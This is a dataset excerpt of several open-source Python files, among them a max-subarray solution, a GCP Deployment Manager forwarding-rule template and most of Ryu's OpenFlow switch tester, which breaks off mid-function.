code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
#!/usr/bin/env python3
from setuptools import setup
setup()
|
scienceopen/pyAIRtools
|
setup.py
|
Python
|
bsd-3-clause
| 61
|
class Solution:
# returns sum of contiguous non-empty subarray with greatest sum
def maxSubArray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
sumCurr = 0
sumMax = -math.inf
for i in range(len(nums)):
sumCurr += nums[i]
if sumCurr > sumMax: # this is checked before negativity in case entire array is negative - in that case the one with the least absolute value will be returned
sumMax = sumCurr
if sumCurr < 0:
sumCurr = 0
return sumMax
|
SelvorWhim/competitive
|
LeetCode/MaximumSubarray.py
|
Python
|
unlicense
| 588
|
# Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This template creates a forwarding rule. """
REGIONAL_GLOBAL_TYPE_NAMES = {
# https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules
True: {
'GA': 'gcp-types/compute-v1:forwardingRules',
'Beta': 'gcp-types/compute-beta:forwardingRules'
},
# https://cloud.google.com/compute/docs/reference/rest/v1/globalForwardingRules
False: {
'GA': 'gcp-types/compute-v1:globalForwardingRules',
'Beta': 'gcp-types/compute-beta:globalForwardingRules'
}
}
def set_optional_property(destination, source, prop_name):
""" Copies the property value, if present. """
if prop_name in source:
destination[prop_name] = source[prop_name]
def get_forwarding_rule_outputs(res_name, region):
""" Creates outputs for the forwarding rule. """
outputs = [
{
'name': 'name',
'value': '$(ref.{}.name)'.format(res_name)
},
{
'name': 'selfLink',
'value': '$(ref.{}.selfLink)'.format(res_name)
},
{
'name': 'IPAddress',
'value': '$(ref.{}.IPAddress)'.format(res_name)
}
]
if region:
outputs.append({'name': 'region', 'value': region})
return outputs
def generate_config(context):
""" Entry point for the deployment resources. """
properties = context.properties
name = properties.get('name', context.env['name'])
project_id = properties.get('project', context.env['project'])
is_regional = 'region' in properties
FW_rule_version = 'Beta' if 'labels' in properties else 'GA'
region = properties.get('region')
rule_properties = {
'name': name,
'project': project_id,
}
resource = {
'name': context.env['name'],
'type': REGIONAL_GLOBAL_TYPE_NAMES[is_regional][FW_rule_version],
'properties': rule_properties
}
optional_properties = [
'description',
'IPAddress',
'IPProtocol',
'portRange',
'ports',
'region',
'target',
'loadBalancingScheme',
'subnetwork',
'network',
'backendService',
'ipVersion',
'serviceLabel',
'networkTier',
'allPorts',
'labels',
]
for prop in optional_properties:
set_optional_property(rule_properties, properties, prop)
outputs = get_forwarding_rule_outputs(context.env['name'], region)
return {'resources': [resource], 'outputs': outputs}
|
GoogleCloudPlatform/cloud-foundation-toolkit
|
dm/templates/forwarding_rule/forwarding_rule.py
|
Python
|
apache-2.0
| 3,116
|
class Capturer:
def toogle_saving_images(self):
pass
def save_images_dir(self, path):
pass
def save_images_speed(self,parity):
pass
def start_capture(self):
pass
def log(self,string):
pass
def get_last_frame_pil(self):
pass
def get_last_frame_bytestring(self):
pass
def get_capture_rect(self):
pass
def get_image_size(self):
pass
|
detorto/mariobot
|
Capture/Capturer.py
|
Python
|
mit
| 446
|
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import logging
import os
import signal
import sys
import traceback
from oslo.config import cfg
# import all packet libraries.
PKT_LIB_PATH = 'ryu.lib.packet'
for modname, moddef in sys.modules.iteritems():
if not modname.startswith(PKT_LIB_PATH) or not moddef:
continue
for (clsname, clsdef, ) in inspect.getmembers(moddef):
if not inspect.isclass(clsdef):
continue
exec 'from %s import %s' % (modname, clsname)
from ryu.base import app_manager
from ryu.controller import handler
from ryu.controller import ofp_event
from ryu.controller.handler import set_ev_cls
from ryu.exception import RyuException
from ryu.lib import dpid as dpid_lib
from ryu.lib import hub
from ryu.lib import stringify
from ryu.lib.packet import packet
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ofproto_v1_3_parser
""" Required test network:
+-----------+
+----------| target sw | The switch to be tested
| +-----------+
+------------+ (1) (2)
| controller | | |
+------------+ (1) (2)
| +-----------+
+----------| tester sw | OpenFlow Switch
+-----------+
(X) : port number
Tests send a packet from port 1 of the tester sw.
If the packet matched with a flow entry of the target sw,
the target sw resends the packet from port 2 (or the port which
connected with the controller), according to the flow entry.
Then the tester sw receives the packet and sends a PacketIn message.
If the packet did not match, the target sw drops the packet.
"""
CONF = cfg.CONF
# Default settings.
TESTER_SENDER_PORT = 1
TESTER_RECEIVE_PORT = 2
TARGET_SENDER_PORT = 2
TARGET_RECEIVE_PORT = 1
INTERVAL = 1 # sec
WAIT_TIMER = 3 # sec
# Test file format.
KEY_DESC = 'description'
KEY_PREREQ = 'prerequisite'
KEY_FLOW = 'OFPFlowMod'
KEY_TESTS = 'tests'
KEY_INGRESS = 'ingress'
KEY_EGRESS = 'egress'
KEY_PKT_IN = 'PACKET_IN'
KEY_TBL_MISS = 'table-miss'
# Test state.
STATE_INIT = 0
STATE_FLOW_INSTALL = 1
STATE_FLOW_EXIST_CHK = 2
STATE_TARGET_PKT_COUNT = 3
STATE_TESTER_PKT_COUNT = 4
STATE_FLOW_MATCH_CHK = 5
STATE_NO_PKTIN_REASON = 6
STATE_GET_MATCH_COUNT = 7
STATE_UNMATCH_PKT_SEND = 8
STATE_FLOW_UNMATCH_CHK = 9
# Test result.
TEST_OK = 'OK'
TEST_ERROR = 'ERROR'
RYU_INTERNAL_ERROR = '- (Ryu internal error.)'
TEST_FILE_ERROR = '%(file)s : Test file format error (%(detail)s)'
NO_TEST_FILE = 'Test file (*.json) is not found.'
INVALID_PATH = '%(path)s : No such file or directory.'
# Test result details.
FAILURE = 0
ERROR = 1
TIMEOUT = 2
RCV_ERR = 3
MSG = {STATE_INIT:
{TIMEOUT: 'Failed to initialize flow tables: barrier request timeout.',
RCV_ERR: 'Failed to initialize flow tables: %(err_msg)s'},
STATE_FLOW_INSTALL:
{TIMEOUT: 'Failed to add flows: barrier request timeout.',
RCV_ERR: 'Failed to add flows: %(err_msg)s'},
STATE_FLOW_EXIST_CHK:
{FAILURE: 'Added incorrect flows: %(flows)s',
TIMEOUT: 'Failed to add flows: flow stats request timeout.',
RCV_ERR: 'Failed to add flows: %(err_msg)s'},
STATE_TARGET_PKT_COUNT:
{TIMEOUT: 'Failed to request port stats from target: request timeout.',
RCV_ERR: 'Failed to request port stats from target: %(err_msg)s'},
STATE_TESTER_PKT_COUNT:
{TIMEOUT: 'Failed to request port stats from tester: request timeout.',
RCV_ERR: 'Failed to request port stats from tester: %(err_msg)s'},
STATE_FLOW_MATCH_CHK:
{FAILURE: 'Received incorrect %(pkt_type)s: %(detail)s',
TIMEOUT: '', # for check no packet-in reason.
RCV_ERR: 'Failed to send packet: %(err_msg)s'},
STATE_NO_PKTIN_REASON:
{FAILURE: 'Receiving timeout: %(detail)s'},
STATE_GET_MATCH_COUNT:
{TIMEOUT: 'Failed to request table stats: request timeout.',
RCV_ERR: 'Failed to request table stats: %(err_msg)s'},
STATE_UNMATCH_PKT_SEND:
{TIMEOUT: 'Faild to send packet: barrier request timeout.',
RCV_ERR: 'Faild to send packet: %(err_msg)s'},
STATE_FLOW_UNMATCH_CHK:
{FAILURE: 'Table-miss error: increment in matched_count.',
ERROR: 'Table-miss error: no change in lookup_count.',
TIMEOUT: 'Failed to request table stats: request timeout.',
RCV_ERR: 'Failed to request table stats: %(err_msg)s'}}
ERR_MSG = 'OFPErrorMsg[type=0x%02x, code=0x%02x]'
class TestMessageBase(RyuException):
def __init__(self, state, message_type, **argv):
msg = MSG[state][message_type] % argv
super(TestMessageBase, self).__init__(msg=msg)
class TestFailure(TestMessageBase):
def __init__(self, state, **argv):
super(TestFailure, self).__init__(state, FAILURE, **argv)
class TestTimeout(TestMessageBase):
def __init__(self, state):
super(TestTimeout, self).__init__(state, TIMEOUT)
class TestReceiveError(TestMessageBase):
def __init__(self, state, err_msg):
argv = {'err_msg': ERR_MSG % (err_msg.type, err_msg.code)}
super(TestReceiveError, self).__init__(state, RCV_ERR, **argv)
class TestError(TestMessageBase):
def __init__(self, state, **argv):
super(TestError, self).__init__(state, ERROR, **argv)
class OfTester(app_manager.RyuApp):
""" OpenFlow Switch Tester. """
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self):
super(OfTester, self).__init__()
self._set_logger()
self.target_dpid = self._convert_dpid(CONF['test-switch']['target'])
self.tester_dpid = self._convert_dpid(CONF['test-switch']['tester'])
self.logger.info('target_dpid=%s',
dpid_lib.dpid_to_str(self.target_dpid))
self.logger.info('tester_dpid=%s',
dpid_lib.dpid_to_str(self.tester_dpid))
test_dir = CONF['test-switch']['dir']
self.logger.info('Test files directory = %s', test_dir)
self.target_sw = None
self.tester_sw = None
self.state = STATE_INIT
self.sw_waiter = None
self.waiter = None
self.send_msg_xids = []
self.rcv_msgs = []
self.test_thread = hub.spawn(
self._test_sequential_execute, test_dir)
def _set_logger(self):
self.logger.propagate = False
s_hdlr = logging.StreamHandler()
self.logger.addHandler(s_hdlr)
if CONF.log_file:
f_hdlr = logging.handlers.WatchedFileHandler(CONF.log_file)
self.logger.addHandler(f_hdlr)
def _convert_dpid(self, dpid_str):
try:
dpid = int(dpid_str, 16)
except ValueError as err:
self.logger.error('Invarid dpid parameter. %s', err)
self._test_end()
return dpid
def close(self):
if self.test_thread is not None:
hub.kill(self.test_thread)
hub.joinall([self.test_thread])
self._test_end('--- Test terminated ---')
@set_ev_cls(ofp_event.EventOFPStateChange,
[handler.MAIN_DISPATCHER, handler.DEAD_DISPATCHER])
def dispacher_change(self, ev):
assert ev.datapath is not None
if ev.state == handler.MAIN_DISPATCHER:
self._register_sw(ev.datapath)
elif ev.state == handler.DEAD_DISPATCHER:
self._unregister_sw(ev.datapath)
def _register_sw(self, dp):
if dp.id == self.target_dpid:
self.target_sw = TargetSw(dp, self.logger)
msg = 'Join target SW.'
elif dp.id == self.tester_dpid:
self.tester_sw = TesterSw(dp, self.logger)
msg = 'Join tester SW.'
else:
msg = 'Connect unknown SW.'
if dp.id:
self.logger.info('dpid=%s : %s',
dpid_lib.dpid_to_str(dp.id), msg)
if self.target_sw and self.tester_sw:
if self.sw_waiter is not None:
self.sw_waiter.set()
def _unregister_sw(self, dp):
if dp.id == self.target_dpid:
del self.target_sw
self.target_sw = None
msg = 'Leave target SW.'
elif dp.id == self.tester_dpid:
del self.tester_sw
self.tester_sw = None
msg = 'Leave tester SW.'
else:
msg = 'Disconnect unknown SW.'
if dp.id:
self.logger.info('dpid=%s : %s',
dpid_lib.dpid_to_str(dp.id), msg)
def _test_sequential_execute(self, test_dir):
""" Execute OpenFlow Switch test. """
# Parse test pattern from test files.
tests = TestPatterns(test_dir, self.logger)
if not tests:
self.logger.warning(NO_TEST_FILE)
self._test_end()
test_report = {}
self.logger.info('--- Test start ---')
test_keys = tests.keys()
test_keys.sort()
for file_name in test_keys:
report = self._test_file_execute(tests[file_name])
for result, descriptions in report.items():
test_report.setdefault(result, [])
test_report[result].extend(descriptions)
self._test_end(msg='--- Test end ---', report=test_report)
def _test_file_execute(self, testfile):
report = {}
for i, test in enumerate(testfile.tests):
desc = testfile.description if i == 0 else None
result = self._test_execute(test, desc)
report.setdefault(result, [])
report[result].append([testfile.description, test.description])
return report
def _test_execute(self, test, description):
if not self.target_sw or not self.tester_sw:
self.logger.info('waiting for switches connection...')
self.sw_waiter = hub.Event()
self.sw_waiter.wait()
self.sw_waiter = None
if description:
self.logger.info('%s', description)
# Test execute.
try:
# 0. Initialize.
self._test(STATE_INIT)
# 1. Install flows.
for flow in test.prerequisite:
self._test(STATE_FLOW_INSTALL, flow)
self._test(STATE_FLOW_EXIST_CHK, flow)
# 2. Check flow matching.
for pkt in test.tests:
if KEY_EGRESS in pkt or KEY_PKT_IN in pkt:
target_pkt_count = [self._test(STATE_TARGET_PKT_COUNT,
True)]
tester_pkt_count = [self._test(STATE_TESTER_PKT_COUNT,
False)]
result = self._test(STATE_FLOW_MATCH_CHK, pkt)
if result == TIMEOUT:
target_pkt_count.append(self._test(
STATE_TARGET_PKT_COUNT, True))
tester_pkt_count.append(self._test(
STATE_TESTER_PKT_COUNT, False))
test_type = (KEY_EGRESS if KEY_EGRESS in pkt
else KEY_PKT_IN)
self._test(STATE_NO_PKTIN_REASON, test_type,
target_pkt_count, tester_pkt_count)
else:
before_stats = self._test(STATE_GET_MATCH_COUNT)
self._test(STATE_UNMATCH_PKT_SEND, pkt)
hub.sleep(INTERVAL)
self._test(STATE_FLOW_UNMATCH_CHK, before_stats, pkt)
result = [TEST_OK]
result_type = TEST_OK
except (TestFailure, TestError,
TestTimeout, TestReceiveError) as err:
result = [TEST_ERROR, str(err)]
result_type = str(err).split(':', 1)[0]
except Exception:
result = [TEST_ERROR, RYU_INTERNAL_ERROR]
result_type = RYU_INTERNAL_ERROR
# Output test result.
self.logger.info(' %-100s %s', test.description, result[0])
if 1 < len(result):
self.logger.info(' %s', result[1])
if (result[1] == RYU_INTERNAL_ERROR
or result == 'An unknown exception'):
self.logger.error(traceback.format_exc())
if result[0] != TEST_OK and self.state == STATE_INIT:
self._test_end('--- Test terminated ---')
hub.sleep(0)
return result_type
def _test_end(self, msg=None, report=None):
self.test_thread = None
if msg:
self.logger.info(msg)
if report:
self._output_test_report(report)
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
def _output_test_report(self, report):
self.logger.info('%s--- Test report ---', os.linesep)
ok_count = error_count = 0
for result_type in sorted(report.keys()):
test_descriptions = report[result_type]
if result_type == TEST_OK:
ok_count = len(test_descriptions)
continue
error_count += len(test_descriptions)
self.logger.info('%s(%d)', result_type, len(test_descriptions))
for file_desc, test_desc in test_descriptions:
self.logger.info(' %-40s %s', file_desc, test_desc)
self.logger.info('%s%s(%d) / %s(%d)', os.linesep,
TEST_OK, ok_count, TEST_ERROR, error_count)
def _test(self, state, *args):
test = {STATE_INIT: self._test_initialize,
STATE_FLOW_INSTALL: self._test_flow_install,
STATE_FLOW_EXIST_CHK: self._test_flow_exist_check,
STATE_TARGET_PKT_COUNT: self._test_get_packet_count,
STATE_TESTER_PKT_COUNT: self._test_get_packet_count,
STATE_FLOW_MATCH_CHK: self._test_flow_matching_check,
STATE_NO_PKTIN_REASON: self._test_no_pktin_reason_check,
STATE_GET_MATCH_COUNT: self._test_get_match_count,
STATE_UNMATCH_PKT_SEND: self._test_unmatch_packet_send,
STATE_FLOW_UNMATCH_CHK: self._test_flow_unmatching_check}
self.send_msg_xids = []
self.rcv_msgs = []
self.state = state
return test[state](*args)
def _test_initialize(self):
xid = self.target_sw.del_test_flow()
self.send_msg_xids.append(xid)
xid = self.target_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_install(self, flow):
xid = self.target_sw.add_flow(flow_mod=flow)
self.send_msg_xids.append(xid)
xid = self.target_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_exist_check(self, flow_mod):
xid = self.target_sw.send_flow_stats()
self.send_msg_xids.append(xid)
self._wait()
ng_stats = []
for msg in self.rcv_msgs:
assert isinstance(msg, ofproto_v1_3_parser.OFPFlowStatsReply)
for stats in msg.body:
result, stats = self._compare_flow(stats, flow_mod)
if result:
return
else:
ng_stats.append(stats)
raise TestFailure(self.state, flows=', '.join(ng_stats))
def _test_get_packet_count(self, is_target):
sw = self.target_sw if is_target else self.tester_sw
xid = sw.send_port_stats()
self.send_msg_xids.append(xid)
self._wait()
result = {}
for msg in self.rcv_msgs:
for stats in msg.body:
result[stats.port_no] = {'rx': stats.rx_packets,
'tx': stats.tx_packets}
return result
def _test_flow_matching_check(self, pkt):
self.logger.debug("send_packet:[%s]", packet.Packet(pkt[KEY_INGRESS]))
self.logger.debug("egress:[%s]", packet.Packet(pkt.get(KEY_EGRESS)))
self.logger.debug("packet_in:[%s]",
packet.Packet(pkt.get(KEY_PKT_IN)))
# 1. send a packet from the OpenFlow Switch.
xid = self.tester_sw.send_packet_out(pkt[KEY_INGRESS])
self.send_msg_xids.append(xid)
# 2. receive a PacketIn message.
try:
self._wait()
except TestTimeout:
return TIMEOUT
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPPacketIn)
self.logger.debug("dpid=%s : receive_packet[%s]",
dpid_lib.dpid_to_str(msg.datapath.id),
packet.Packet(msg.data))
# 3. check the SW which sended PacketIn and output packet.
pkt_in_src_model = (self.tester_sw if KEY_EGRESS in pkt
else self.target_sw)
model_pkt = (pkt[KEY_EGRESS] if KEY_EGRESS in pkt
else pkt[KEY_PKT_IN])
if msg.datapath.id != pkt_in_src_model.dp.id:
pkt_type = 'packet-in'
err_msg = 'SW[dpid=%s]' % dpid_lib.dpid_to_str(msg.datapath.id)
elif msg.reason != ofproto_v1_3.OFPR_ACTION:
pkt_type = 'packet-in'
err_msg = 'OFPPacketIn[reason=%d]' % msg.reason
elif repr(msg.data) != repr(model_pkt):
pkt_type = 'packet'
err_msg = self._diff_packets(packet.Packet(model_pkt),
packet.Packet(msg.data))
else:
return TEST_OK
raise TestFailure(self.state, pkt_type=pkt_type,
detail=err_msg)
def _test_no_pktin_reason_check(self, test_type,
target_pkt_count, tester_pkt_count):
before_target_receive = target_pkt_count[0][TARGET_RECEIVE_PORT]['rx']
before_target_send = target_pkt_count[0][TARGET_SENDER_PORT]['tx']
before_tester_receive = tester_pkt_count[0][TESTER_RECEIVE_PORT]['rx']
before_tester_send = tester_pkt_count[0][TESTER_SENDER_PORT]['tx']
after_target_receive = target_pkt_count[1][TARGET_RECEIVE_PORT]['rx']
after_target_send = target_pkt_count[1][TARGET_SENDER_PORT]['tx']
after_tester_receive = tester_pkt_count[1][TESTER_RECEIVE_PORT]['rx']
after_tester_send = tester_pkt_count[1][TESTER_SENDER_PORT]['tx']
if after_tester_send == before_tester_send:
log_msg = 'no change in tx_packets on tester.'
elif after_target_receive == before_target_receive:
log_msg = 'no change in rx_packtes on target.'
elif test_type == KEY_EGRESS:
if after_target_send == before_target_send:
log_msg = 'no change in tx_packets on target.'
elif after_tester_receive == before_tester_receive:
log_msg = 'no change in rx_packets on tester.'
else:
log_msg = 'increment in rx_packets in tester.'
else:
assert test_type == KEY_PKT_IN
log_msg = 'no packet-in.'
raise TestFailure(self.state, detail=log_msg)
def _test_get_match_count(self):
xid = self.target_sw.send_table_stats()
self.send_msg_xids.append(xid)
self._wait()
result = {}
for msg in self.rcv_msgs:
for stats in msg.body:
result[stats.table_id] = {'lookup': stats.lookup_count,
'matched': stats.matched_count}
return result
def _test_unmatch_packet_send(self, pkt):
# Send a packet from the OpenFlow Switch.
self.logger.debug("send_packet:[%s]", packet.Packet(pkt[KEY_INGRESS]))
self.tester_sw.send_packet_out(pkt[KEY_INGRESS])
# Wait OFPBarrierReply.
xid = self.tester_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_unmatching_check(self, before_stats, pkt):
# Check matched packet count.
rcv_msgs = self._test_get_match_count()
lookup = False
for target_tbl_id in pkt[KEY_TBL_MISS]:
before = before_stats[target_tbl_id]
after = rcv_msgs[target_tbl_id]
if before['lookup'] < after['lookup']:
lookup = True
if before['matched'] < after['matched']:
raise TestFailure(self.state)
if not lookup:
raise TestError(self.state)
def _compare_flow(self, stats1, stats2):
attr_list = ['cookie', 'priority', 'hard_timeout', 'idle_timeout',
'table_id', 'instructions', 'match']
for attr in attr_list:
value1 = getattr(stats1, attr)
value2 = getattr(stats2, attr)
if attr == 'instructions':
value1 = sorted(value1)
value2 = sorted(value2)
if str(value1) != str(value2):
flow_stats = []
for attr in attr_list:
flow_stats.append('%s=%s' % (attr, getattr(stats1, attr)))
return False, 'flow_stats(%s)' % ','.join(flow_stats)
return True, None
def _diff_packets(self, model_pkt, rcv_pkt):
msg = []
for rcv_p in rcv_pkt.protocols:
if type(rcv_p) != str:
model_protocols = model_pkt.get_protocols(type(rcv_p))
if len(model_protocols) == 1:
model_p = model_protocols[0]
diff = []
for attr in rcv_p.__dict__:
if attr.startswith('_'):
continue
if callable(attr):
continue
if hasattr(rcv_p.__class__, attr):
continue
rcv_attr = repr(getattr(rcv_p, attr))
model_attr = repr(getattr(model_p, attr))
if rcv_attr != model_attr:
diff.append('%s=%s' % (attr, rcv_attr))
if diff:
msg.append('%s(%s)' %
(rcv_p.__class__.__name__,
','.join(diff)))
else:
if (not model_protocols or
not str(rcv_p) in str(model_protocols)):
msg.append(str(rcv_p))
else:
model_p = ''
for p in model_pkt.protocols:
if type(p) == str:
model_p = p
break
if model_p != rcv_p:
msg.append('str(%s)' % repr(rcv_p))
if msg:
return '/'.join(msg)
else:
return ('Encounter an error during packet comparison.'
' it is malformed.')
def _wait(self):
""" Wait until specific OFP message received
or timer is exceeded. """
assert self.waiter is None
self.waiter = hub.Event()
self.rcv_msgs = []
timeout = False
timer = hub.Timeout(WAIT_TIMER)
try:
self.waiter.wait()
except hub.Timeout as t:
if t is not timer:
raise RyuException('Internal error. Not my timeout.')
timeout = True
finally:
timer.cancel()
self.waiter = None
if timeout:
raise TestTimeout(self.state)
if (self.rcv_msgs and isinstance(
self.rcv_msgs[0], ofproto_v1_3_parser.OFPErrorMsg)):
raise TestReceiveError(self.state, self.rcv_msgs[0])
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, handler.MAIN_DISPATCHER)
def flow_stats_reply_handler(self, ev):
state_list = [STATE_FLOW_EXIST_CHK]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPTableStatsReply, handler.MAIN_DISPATCHER)
def table_stats_reply_handler(self, ev):
state_list = [STATE_GET_MATCH_COUNT,
STATE_FLOW_UNMATCH_CHK]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, handler.MAIN_DISPATCHER)
def port_stats_reply_handler(self, ev):
state_list = [STATE_TARGET_PKT_COUNT,
STATE_TESTER_PKT_COUNT]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPBarrierReply, handler.MAIN_DISPATCHER)
def barrier_reply_handler(self, ev):
state_list = [STATE_INIT,
STATE_FLOW_INSTALL,
STATE_UNMATCH_PKT_SEND]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPPacketIn, handler.MAIN_DISPATCHER)
def packet_in_handler(self, ev):
state_list = [STATE_FLOW_MATCH_CHK]
if self.state in state_list:
if self.waiter:
self.rcv_msgs.append(ev.msg)
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPErrorMsg, [handler.HANDSHAKE_DISPATCHER,
handler.CONFIG_DISPATCHER,
handler.MAIN_DISPATCHER])
def error_msg_handler(self, ev):
if ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if self.waiter:
self.waiter.set()
hub.sleep(0)
class OpenFlowSw(object):
def __init__(self, dp, logger):
super(OpenFlowSw, self).__init__()
self.dp = dp
self.logger = logger
def _send_msg(self, msg):
msg.xid = None
self.dp.set_xid(msg)
self.dp.send_msg(msg)
return msg.xid
def add_flow(self, flow_mod=None, in_port=None, out_port=None):
""" Add flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
if flow_mod:
mod = flow_mod
else:
match = parser.OFPMatch(in_port=in_port)
max_len = (0 if out_port != ofp.OFPP_CONTROLLER
else ofp.OFPCML_MAX)
actions = [parser.OFPActionOutput(out_port, max_len)]
inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,
actions)]
mod = parser.OFPFlowMod(self.dp, cookie=0,
command=ofp.OFPFC_ADD,
match=match, instructions=inst)
return self._send_msg(mod)
def send_barrier_request(self):
""" send a BARRIER_REQUEST message."""
parser = self.dp.ofproto_parser
req = parser.OFPBarrierRequest(self.dp)
return self._send_msg(req)
def send_port_stats(self):
""" Get port stats."""
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
flags = 0
req = parser.OFPPortStatsRequest(self.dp, flags, ofp.OFPP_ANY)
return self._send_msg(req)
class TargetSw(OpenFlowSw):
def __init__(self, dp, logger):
super(TargetSw, self).__init__(dp, logger)
def del_test_flow(self):
""" Delete all flow except default flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
mod = parser.OFPFlowMod(self.dp,
table_id=ofp.OFPTT_ALL,
command=ofp.OFPFC_DELETE,
out_port=ofp.OFPP_ANY,
out_group=ofp.OFPG_ANY)
return self._send_msg(mod)
def send_flow_stats(self):
""" Get all flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
req = parser.OFPFlowStatsRequest(self.dp, 0, ofp.OFPTT_ALL,
ofp.OFPP_ANY, ofp.OFPG_ANY,
0, 0, parser.OFPMatch())
return self._send_msg(req)
def send_table_stats(self):
""" Get table stats. """
parser = self.dp.ofproto_parser
req = parser.OFPTableStatsRequest(self.dp, 0)
return self._send_msg(req)
class TesterSw(OpenFlowSw):
def __init__(self, dp, logger):
super(TesterSw, self).__init__(dp, logger)
# Add packet in flow.
ofp = self.dp.ofproto
self.add_flow(in_port=TESTER_RECEIVE_PORT,
out_port=ofp.OFPP_CONTROLLER)
def send_packet_out(self, data):
""" send a PacketOut message."""
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
actions = [parser.OFPActionOutput(TESTER_SENDER_PORT)]
out = parser.OFPPacketOut(
datapath=self.dp, buffer_id=ofp.OFP_NO_BUFFER,
data=data, in_port=ofp.OFPP_CONTROLLER, actions=actions)
return self._send_msg(out)
class TestPatterns(dict):
""" List of Test class objects. """
def __init__(self, test_dir, logger):
super(TestPatterns, self).__init__()
self.logger = logger
# Parse test pattern from test files.
self._get_tests(test_dir)
def _get_tests(self, path):
if not os.path.exists(path):
msg = INVALID_PATH % {'path': path}
self.logger.warning(msg)
return
if os.path.isdir(path): # Directory
for test_path in os.listdir(path):
test_path = path + (test_path if path[-1:] == '/'
else '/%s' % test_path)
self._get_tests(test_path)
elif os.path.isfile(path): # File
(dummy, ext) = os.path.splitext(path)
if ext == '.json':
test = TestFile(path, self.logger)
self[test.description] = test
class TestFile(stringify.StringifyMixin):
"""Test File object include Test objects."""
def __init__(self, path, logger):
super(TestFile, self).__init__()
self.logger = logger
self.description = None
self.tests = []
self._get_tests(path)
def _get_tests(self, path):
with open(path, 'rb') as fhandle:
buf = fhandle.read()
try:
json_list = json.loads(buf)
for test_json in json_list:
if isinstance(test_json, unicode):
self.description = test_json
else:
self.tests.append(Test(test_json))
except (ValueError, TypeError) as e:
result = (TEST_FILE_ERROR %
{'file': path, 'detail': e.message})
self.logger.warning(result)
class Test(stringify.StringifyMixin):
def __init__(self, test_json):
super(Test, self).__init__()
(self.description,
self.prerequisite,
self.tests) = self._parse_test(test_json)
def _parse_test(self, buf):
def __test_pkt_from_json(test):
data = eval('/'.join(test))
data.serialize()
return str(data.data)
# parse 'description'
description = buf.get(KEY_DESC)
# parse 'prerequisite'
prerequisite = []
if not KEY_PREREQ in buf:
raise ValueError('a test requires a "%s" block' % KEY_PREREQ)
for flow in buf[KEY_PREREQ]:
cls = getattr(ofproto_v1_3_parser, KEY_FLOW)
msg = cls.from_jsondict(flow[KEY_FLOW], datapath=DummyDatapath())
msg.version = ofproto_v1_3.OFP_VERSION
msg.msg_type = msg.cls_msg_type
msg.xid = 0
prerequisite.append(msg)
# parse 'tests'
tests = []
if not KEY_TESTS in buf:
raise ValueError('a test requires a "%s" block.' % KEY_TESTS)
for test in buf[KEY_TESTS]:
if len(test) != 2:
raise ValueError(
'"%s" block requires "%s" field and one of "%s" or "%s"'
' or "%s" field.' % (KEY_TESTS, KEY_INGRESS, KEY_EGRESS,
KEY_PKT_IN, KEY_TBL_MISS))
test_pkt = {}
# parse 'ingress'
if not KEY_INGRESS in test:
raise ValueError('a test requires "%s" field.' % KEY_INGRESS)
